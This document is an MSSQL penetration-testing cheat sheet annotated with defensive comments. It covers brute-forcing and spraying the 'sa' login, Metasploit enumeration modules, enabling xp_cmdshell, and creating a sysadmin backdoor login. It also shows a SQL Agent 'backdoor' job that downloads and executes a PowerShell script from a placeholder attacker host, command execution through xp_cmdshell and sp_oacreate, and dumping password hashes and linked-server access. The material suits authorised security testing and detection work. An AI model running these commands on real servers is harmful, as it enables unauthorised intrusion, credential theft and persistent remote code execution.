
🪟 MSSQL Pentesting

πŸ” Enum ​

bash
# Service discovery and credential guessing against SQL Server (TCP 1433).
# Defensive note: every command below produces connection attempts and failed
# logins on the instance; a burst of failed logins for 'sa', or for many
# distinct names in a short window, is the pattern to alert on.

# Nmap scripts: run every NSE script whose name starts with ms-sql- against port 1433
nmap -p 1433 --script ms-sql-* <target>

# Hydra brute-force: single login 'sa', candidate passwords read from rockyou.txt
hydra -l sa -P rockyou.txt mssql://<target>

# Password Spraying: one password tried once per name in usernames.txt
# (--no-bruteforce pairs users with passwords instead of trying every combination;
#  --continue-on-success keeps going after the first valid pair)
netexec mssql example.com -u usernames.txt -p 'password' --no-bruteforce --continue-on-success
bash
# Metasploit modules for SQL Server enumeration. These are authenticated
# modules: each expects valid instance credentials in its options (check
# `show options` after `use`), so they come after the credential step above.
msfconsole
msf> use admin/mssql/mssql_enum
msf> use admin/mssql/mssql_enum_domain_accounts
msf> use admin/mssql/mssql_enum_sql_logins
msf> use auxiliary/admin/mssql/mssql_findandsampledata
msf> use auxiliary/admin/mssql/mssql_idf
msf> use auxiliary/scanner/mssql/mssql_hashdump
msf> use auxiliary/scanner/mssql/mssql_schemadump
sql
-- Post-authentication reconnaissance. All of these are read-only catalog queries;
-- the three legacy views (sysdatabases, sysobjects, syscolumns) are SQL Server 2000
-- compatibility views, kept here because they still resolve on current versions.
-- Version & user
SELECT @@version;
SELECT SYSTEM_USER;                                               -- login name of the current session
SELECT IS_SRVROLEMEMBER('sysadmin');                              -- 1 = current login is sysadmin, 0 = not, NULL = check could not be resolved

SELECT * FROM sys.database_principals;                            -- List all users (principals of the current database; SELECT * is fine interactively, name columns in saved scripts)
SELECT name FROM master.dbo.sysdatabases;                         -- List databases (legacy view; sys.databases is the current catalog view)
SELECT name FROM sysobjects WHERE xtype='U';                      -- List tables in current DB (xtype 'U' = user table)
SELECT * FROM sys.schemas;                                        -- schemas
SELECT name FROM syscolumns WHERE id = OBJECT_ID('table_name');   -- List columns ('table_name' is a placeholder)

🖥️ Command

bash
# Interactive clients for an instance whose credentials are already known.
# Note: a password passed on the command line lands in shell history and is
# readable by other local users through the process list; where the tool
# offers an interactive password prompt, omit -P / the inline password instead.

# Connect with sqsh (Linux tool)
sqsh -S <target> -U sa -P password

# Connect with mssql-cli (server and port separated by a comma, SQL Server style)
mssql-cli -S <target>,1433 -U sa -P password

# Impacket (for automation); -windows-auth selects Windows authentication
# instead of the default SQL authentication
impacket-mssqlclient sa:password@<target> -windows-auth

🚀 PrivEsc

sql
-- Changing these options requires sysadmin (or serveradmin). Each sp_configure
-- change writes a "Configuration option '...' changed from 0 to 1" line to the
-- SQL Server error log, so enabling xp_cmdshell is a high-signal event to monitor;
-- both options are off by default and should stay off unless a documented need exists.

-- Enable advanced options (xp_cmdshell is only visible to sp_configure once this is on)
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;

-- Enable xp_cmdshell
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;

-- Add admin user: creates a SQL login and grants it sysadmin. sp_addsrvrolemember is a
-- deprecated procedure but still works. The new login shows up in sys.server_principals,
-- and principal/role changes are normally captured by the default trace or a server audit
-- when one is configured. Login name and password here are sample values.
CREATE LOGIN hacker WITH PASSWORD = 'pwned123!';
EXEC sp_addsrvrolemember 'hacker', 'sysadmin';
bash
# Metasploit: exploit module that walks linked-server chains outward from an
# instance it can already authenticate to; it needs credentials for that first hop.
msfconsole
msf> use exploit/windows/mssql/mssql_linkcrawler

πŸ•΅οΈ Impersonation ​

sql
-- Impersonation only succeeds when the current login holds IMPERSONATE on the target
-- login. A grant of IMPERSONATE on 'sa' (or any sysadmin login) to a lower-privileged
-- login is itself a misconfiguration; such grants are listed in sys.server_permissions.
-- Assume impersonation is allowed
EXECUTE AS 'sa';
-- xp_cmdshell must already be enabled (see PrivEsc). For a sysadmin caller the command
-- runs as the SQL Server service account, so 'whoami' reports that OS account, not 'sa'.
EXEC xp_cmdshell 'whoami';

🔒 Persistence

sql
-- Persistence through SQL Server Agent: a scheduled job whose step runs an OS command.
-- Defensive notes: the job is not actually hidden -- it and its full step text are
-- visible in msdb.dbo.sysjobs and msdb.dbo.sysjobsteps; a CMDEXEC step owned by a
-- sysadmin runs under the Agent service account unless a proxy is assigned; and a
-- job step that downloads and runs a remote script is the indicator to hunt for,
-- regardless of the schedule it is attached to.
-- Create hidden job (SQL Agent)
EXEC sp_add_job @job_name='backdoor', @enabled=1;
-- Step of subsystem CMDEXEC = run through the OS shell
EXEC sp_add_jobstep @job_name='backdoor', @step_name='cmd',
  @subsystem='CMDEXEC',
  @command='powershell -c "IEX (New-Object Net.WebClient).DownloadString(http://attacker/shell.ps1)"';
-- @freq_type=4 is a daily schedule; @freq_interval=1 means every day
EXEC sp_add_schedule @schedule_name='daily', @freq_type=4, @freq_interval=1;
EXEC sp_attach_schedule @job_name='backdoor', @schedule_name='daily';
-- No @server_name given, so the job targets the local instance
EXEC sp_add_jobserver @job_name='backdoor';

💥 RCE

sql
-- Using xp_cmdshell (must be enabled first; it is off by default, and for sysadmin
-- callers each invocation runs as the SQL Server service account, so the enablement
-- of the option -- not the individual call -- is the control point)
EXEC xp_cmdshell 'whoami';

-- PowerShell obfuscation: -e takes a base64-encoded UTF-16LE command string. The
-- encoding hides intent from a casual read of the SQL text, but the decoded command
-- is still recorded by PowerShell script block logging (Event ID 4104) where enabled.
EXEC xp_cmdshell 'powershell -e <BASE64_PAYLOAD>';
sql
-- Using sp_oacreate: an alternative to xp_cmdshell that needs the 'Ole Automation
-- Procedures' option enabled via sp_configure; it is off by default and its enablement
-- is logged in the error log the same way as xp_cmdshell.
DECLARE @o INT;                                            -- receives the object token created below
EXEC sp_oacreate 'wscript.shell', @o OUT;
-- 'run' launches the command; the return value is discarded (NULL), so no output is
-- captured, and the object is never released (no sp_oadestroy) by this snippet.
EXEC sp_oamethod @o, 'run', NULL, 'cmd.exe /c whoami';

📂 Looting

sql
-- Read local file through the OS shell (xp_cmdshell already enabled); the read happens
-- with the permissions of the SQL Server service account, which is one more reason to
-- run the service under a least-privileged account rather than LocalSystem.
EXEC xp_cmdshell 'type C:\Windows\System32\drivers\etc\hosts';

-- Dump password hashes (not passwords). password_hash is only non-NULL for a caller
-- with CONTROL SERVER, which sysadmin implies; the hashes can be attacked offline,
-- so strong login passwords and a small sysadmin membership are the mitigations.
SELECT name, password_hash FROM master.sys.sql_logins;

-- Grab linked servers: each link carries its own configured remote credentials, so a
-- link mapped to a high-privilege remote login is a lateral-movement path. Audit the
-- login mappings of every link and map them to least-privileged remote accounts.
EXEC sp_linkedservers;
SELECT * FROM OPENQUERY("linked_server", 'SELECT name FROM master..sysdatabases');   -- inner query runs on the remote side; "linked_server" is a placeholder name